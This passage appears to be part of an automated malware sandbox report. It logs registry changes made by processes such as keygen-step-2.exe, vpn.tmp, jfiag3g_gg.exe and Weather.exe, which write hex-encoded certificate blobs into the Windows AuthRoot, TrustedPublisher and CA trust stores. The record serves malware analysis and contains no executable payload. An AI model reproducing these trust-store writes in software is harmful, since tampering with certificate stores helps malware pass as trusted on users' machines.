4d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 jfiag3g_gg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 jfiag3g_gg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Weather.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c000000010000000400000000080000190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Weather.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD Weather.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 jfiag3g_gg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 jfiag3g_gg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Weather.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f Weather.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-2.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 